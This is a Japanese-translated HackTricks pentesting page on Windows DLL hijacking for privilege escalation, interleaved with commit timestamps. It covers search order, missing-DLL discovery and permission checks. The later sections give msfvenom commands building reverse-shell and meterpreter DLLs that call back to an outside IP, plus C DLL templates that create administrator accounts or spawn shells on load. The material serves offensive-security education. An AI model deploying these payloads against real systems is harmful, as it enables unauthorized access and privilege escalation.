2023-12-26 02:42:22 +00:00
# Dll Hijacking
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< summary > Support HackTricks< / summary >
2024-01-02 22:36:59 +00:00
2024-07-19 16:28:25 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-07-19 16:28:25 +00:00
**Bug bounty tip**: **sign up** for **Intigriti** , a premium **bug bounty platform created by hackers, for hackers** ! Join us at [**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks ) today, and start earning bounties up to ** $100,000**!
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2024-07-19 16:28:25 +00:00
## Basic Information
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
DLL Hijackingは、信頼されたアプリケーションを操作して悪意のあるDLLを読み込ませることを含みます。この用語は、**DLL Spoofing、Injection、Side-Loading**などのいくつかの戦術を含みます。主にコード実行、持続性の達成、そしてあまり一般的ではないが特権昇格に利用されます。ここでの昇格に焦点を当てていますが、ハイジャックの方法は目的に関係なく一貫しています。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### Common Techniques
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
DLLハイジャックにはいくつかの方法があり、各アプリケーションのDLL読み込み戦略に応じて効果が異なります:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
1. **DLL Replacement** : 正規のDLLを悪意のあるDLLと入れ替え、オプションでDLLプロキシを使用して元のDLLの機能を保持します。
2. **DLL Search Order Hijacking** : 悪意のあるDLLを正当なDLLの前に検索パスに配置し、アプリケーションの検索パターンを悪用します。
3. **Phantom DLL Hijacking** : アプリケーションが存在しない必要なDLLだと思い込んで読み込む悪意のあるDLLを作成します。
4. **DLL Redirection** : `%PATH%` や`.exe.manifest` / `.exe.local` ファイルの検索パラメータを変更して、アプリケーションを悪意のあるDLLに誘導します。
5. **WinSxS DLL Replacement** : WinSxSディレクトリ内で正当なDLLを悪意のあるDLLに置き換えます。この方法はDLLサイドローディングに関連しています。
6. **Relative Path DLL Hijacking** : コピーしたアプリケーションと共にユーザーが制御するディレクトリに悪意のあるDLLを配置し、バイナリプロキシ実行技術に似ています。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
## Finding missing Dlls
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
システム内の欠落しているDLLを見つける最も一般的な方法は、sysinternalsから[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)を実行し、**次の2つのフィルターを設定**します:
2020-07-15 15:43:14 +00:00
2023-03-04 19:33:37 +00:00
![](< .. / . . / . gitbook / assets / image ( 311 ) . png > )
2020-07-15 15:43:14 +00:00
2023-03-04 19:33:37 +00:00
![](< .. / . . / . gitbook / assets / image ( 313 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
そして、**ファイルシステムアクティビティ**のみを表示します:
2020-07-15 15:43:14 +00:00
2023-03-04 19:33:37 +00:00
![](< .. / . . / . gitbook / assets / image ( 314 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
一般的に**欠落しているdllを探している**場合は、これを**数秒間**実行します。\
特定の実行可能ファイル内の**欠落しているdllを探している**場合は、**"Process Name" "contains" "\<exec name>"**のような別のフィルターを設定し、それを実行してイベントのキャプチャを停止する必要があります。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
## Exploiting Missing Dlls
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
特権を昇格させるための最良のチャンスは、**特権プロセスが読み込もうとするdllを書くことができる**ことです。したがって、**元のdll**があるフォルダーの前に**dllが検索されるフォルダー**に**dllを書く**ことができるか、**dllが検索されるフォルダー**に書き込むことができ、元の**dllがどのフォルダーにも存在しない**場合です。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### Dll Search Order
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**Microsoftのドキュメント**[**こちら**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **で、DLLがどのように読み込まれるかを具体的に確認できます。**
2023-12-26 02:42:22 +00:00
2024-07-19 16:28:25 +00:00
**Windowsアプリケーション**は、特定の順序に従って**事前定義された検索パス**に従ってDLLを探します。DLLハイジャックの問題は、有害なDLLがこれらのディレクトリの1つに戦略的に配置され、正当なDLLの前に読み込まれることを保証する場合に発生します。この問題を防ぐための解決策は、アプリケーションが必要なDLLを参照する際に絶対パスを使用することです。
2023-12-26 02:42:22 +00:00
2024-07-19 16:28:25 +00:00
32ビットシステムの**DLL検索順序**は以下の通りです:
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
1. アプリケーションが読み込まれたディレクトリ。
2024-07-19 16:28:25 +00:00
2. システムディレクトリ。 [**GetSystemDirectory** ](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya )関数を使用してこのディレクトリのパスを取得します。(_C:\Windows\System32_)
3. 16ビットシステムディレクトリ。このディレクトリのパスを取得する関数はありませんが、検索されます。 (_C:\Windows\System_)
4. Windowsディレクトリ。 [**GetWindowsDirectory** ](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya )関数を使用してこのディレクトリのパスを取得します。(_C:\Windows_)
2023-07-07 23:42:27 +00:00
5. 現在のディレクトリ。
2024-07-19 16:28:25 +00:00
6. PATH環境変数にリストされているディレクトリ。これは、**App Paths**レジストリキーによって指定されたアプリケーションごとのパスを含まないことに注意してください。 **App Paths**キーは、DLL検索パスを計算する際には使用されません。
2024-02-08 03:59:37 +00:00
2024-07-19 16:28:25 +00:00
これは、**SafeDllSearchMode**が有効な場合の**デフォルト**の検索順序です。無効にすると、現在のディレクトリが2番目の位置に昇格します。この機能を無効にするには、**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**レジストリ値を作成し、0に設定します( デフォルトは有効) 。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
[**LoadLibraryEx** ](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa )関数が**LOAD\_WITH\_ALTERED\_SEARCH\_PATH**で呼び出されると、検索は**LoadLibraryEx**が読み込んでいる実行可能モジュールのディレクトリから始まります。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
最後に、**dllは名前だけでなく絶対パスを指定して読み込まれる可能性がある**ことに注意してください。その場合、そのdllは**そのパス内でのみ検索されます**( dllに依存関係がある場合、それらは名前で読み込まれたものとして検索されます) 。
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
検索順序を変更する他の方法もありますが、ここでは説明しません。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
#### Exceptions on dll search order from Windows docs
Windowsのドキュメントには、標準のDLL検索順序に関する特定の例外が記載されています:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
* **メモリに既に読み込まれているDLLと同じ名前のDLL**が遭遇した場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。
* DLLが現在のWindowsバージョンの**既知のDLL**として認識される場合、システムはその既知のDLLのバージョンとその依存DLLを使用し、**検索プロセスを省略します**。レジストリキー**HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**には、これらの既知のDLLのリストが保持されています。
* **DLLに依存関係がある場合**、これらの依存DLLの検索は、最初のDLLがフルパスで識別されたかどうかに関係なく、**モジュール名**のみで示されたかのように行われます。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### Escalating Privileges
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**Requirements**:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
* **異なる特権**(水平または側方移動)で動作するか、動作するプロセスを特定し、**DLLが欠落している**ことを確認します。
* **DLLが検索される**任意の**ディレクトリ**に**書き込みアクセス**があることを確認します。この場所は、実行可能ファイルのディレクトリまたはシステムパス内のディレクトリである可能性があります。
2024-01-02 22:36:59 +00:00
2024-07-19 16:28:25 +00:00
はい、要件は**デフォルトでは特権のある実行可能ファイルがDLLを欠落させているのを見つけるのは奇妙であり**、**システムパスフォルダーに書き込み権限を持つのはさらに奇妙です**(デフォルトではできません)。しかし、設定が不適切な環境ではこれは可能です。\
要件を満たすことができた場合は、[UACME](https://github.com/hfiref0x/UACME)プロジェクトを確認できます。**プロジェクトの主な目的はUACをバイパスすることですが、使用できるWindowsバージョンのDLLハイジャックの**PoC**が見つかるかもしれません(おそらく書き込み権限のあるフォルダーのパスを変更するだけで済みます)。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
フォルダー内の**権限を確認する**には、次のようにします:
2020-07-15 15:43:14 +00:00
```bash
accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"
```
2024-07-19 16:28:25 +00:00
そして**PATH内のすべてのフォルダーの権限を確認する**:
2020-07-15 15:43:14 +00:00
```bash
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
```
2024-07-19 16:28:25 +00:00
あなたは次のコマンドを使って、実行可能ファイルのインポートとDLLのエクスポートを確認することもできます:
2020-07-15 15:43:14 +00:00
```c
dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /export /path/file.dll
```
2024-07-19 16:28:25 +00:00
For a full guide on how to **abuse Dll Hijacking to escalate privileges** with permissions to write in a **System Path folder** check:
2023-03-04 19:17:01 +00:00
2023-03-04 19:33:37 +00:00
{% content-ref url="dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md" %}
[writable-sys-path-+dll-hijacking-privesc.md ](dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md )
2023-03-04 19:17:01 +00:00
{% endcontent-ref %}
2024-07-19 16:28:25 +00:00
### Automated tools
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS )は、システムPATH内の任意のフォルダーに書き込み権限があるかどうかを確認します。\
この脆弱性を発見するための他の興味深い自動化ツールは、**PowerSploit関数**: _Find-ProcessDLLHijack_、_Find-PathDLLHijack_、および_Write-HijackDll_です。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### Example
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
利用可能なシナリオを見つけた場合、成功裏にそれを悪用するための最も重要なことの1つは、**実行可能ファイルがインポートするすべての関数を少なくともエクスポートするdllを作成すること**です。とにかく、Dll Hijackingは、[**中程度の整合性レベルから高い整合性レベルに昇格するために便利です( UACをバイパス) **](../authentication-credentials-uac-and-efs.md#uac)または[**高い整合性からSYSTEMに昇格するために**](./#from-high-integrity-to-system)**。** 有効なdllを作成する方法の例は、実行のためのdllハイジャックに焦点を当てたこのdllハイジャック研究の中にあります: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
さらに、**次のセクション**では、**テンプレート**として役立つ可能性のある**基本的なdllコード**や、**不要な関数をエクスポートしたdllを作成するためのコード**を見つけることができます。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
## **Creating and compiling Dlls**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### **Dll Proxifying**
2023-03-04 19:17:01 +00:00
2024-07-19 16:28:25 +00:00
基本的に、**Dllプロキシ**は、**読み込まれたときに悪意のあるコードを実行することができるDll**ですが、**実際のライブラリへのすべての呼び出しを中継することによって**、**期待通りに機能する**こともできます。
2023-03-04 19:17:01 +00:00
2024-07-19 16:28:25 +00:00
ツール[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)または[**Spartacus**](https://github.com/Accenture/Spartacus)を使用すると、実行可能ファイルを指定し、プロキシ化したいライブラリを選択して**プロキシ化されたdllを生成**したり、**Dllを指定してプロキシ化されたdllを生成**したりできます。
2023-03-04 19:17:01 +00:00
2022-05-24 00:07:19 +00:00
### **Meterpreter**
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**Get rev shell (x64):**
2023-03-04 19:52:31 +00:00
```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
```
2024-07-19 16:28:25 +00:00
**メタプリタを取得する (x86):**
2023-07-07 23:42:27 +00:00
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
```
2024-07-19 16:28:25 +00:00
**ユーザーを作成する (x86のバージョンしか見ていません):**
2023-03-04 19:17:01 +00:00
```
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
```
2024-07-19 16:28:25 +00:00
### あなた自身の
2023-03-04 19:17:01 +00:00
2024-07-19 16:28:25 +00:00
いくつかのケースでは、コンパイルしたDllは、**被害者プロセスによってロードされるいくつかの関数をエクスポートする必要があります**。これらの関数が存在しない場合、**バイナリはそれらをロードできず**、**エクスプロイトは失敗します**。
2020-07-15 15:43:14 +00:00
```c
// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
2023-07-07 23:42:27 +00:00
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("whoami > C:\\users\\username\\whoami.txt");
WinExec("calc.exe", 0); //This doesn't accept redirections like system
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
2020-07-15 15:43:14 +00:00
}
```
```c
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
2023-07-07 23:42:27 +00:00
if (dwReason == DLL_PROCESS_ATTACH){
system("cmd.exe /k net localgroup administrators user /add");
ExitProcess(0);
}
return TRUE;
2020-07-15 15:43:14 +00:00
}
```
```c
//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
#include <windows.h>
int owned()
{
2023-07-07 23:42:27 +00:00
WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
exit(0);
return 0;
2020-07-15 15:43:14 +00:00
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
2023-07-07 23:42:27 +00:00
owned();
return 0;
2020-07-15 15:43:14 +00:00
}
```
```c
//Another possible DLL
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
void Entry (){ //Default function that is executed when the DLL is loaded
2023-07-07 23:42:27 +00:00
system("cmd");
2020-07-15 15:43:14 +00:00
}
BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
2023-07-07 23:42:27 +00:00
switch (ul_reason_for_call){
case DLL_PROCESS_ATTACH:
CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DEATCH:
break;
}
return TRUE;
2020-07-15 15:43:14 +00:00
}
```
2024-02-08 03:59:37 +00:00
## 参考文献
2024-02-18 14:52:15 +00:00
2024-02-08 03:59:37 +00:00
* [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e ](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e )
* [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html ](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html )
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-08 03:59:37 +00:00
2024-07-19 16:28:25 +00:00
**バグバウンティのヒント**: **ハッカーによる、ハッカーのためのプレミアム** **バグバウンティプラットフォーム** **Intigriti**に**サインアップ**しましょう!今日、[**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)で私たちに参加し、最大**$100,000**のバウンティを獲得し始めましょう!
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2024-01-02 22:36:59 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングのトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}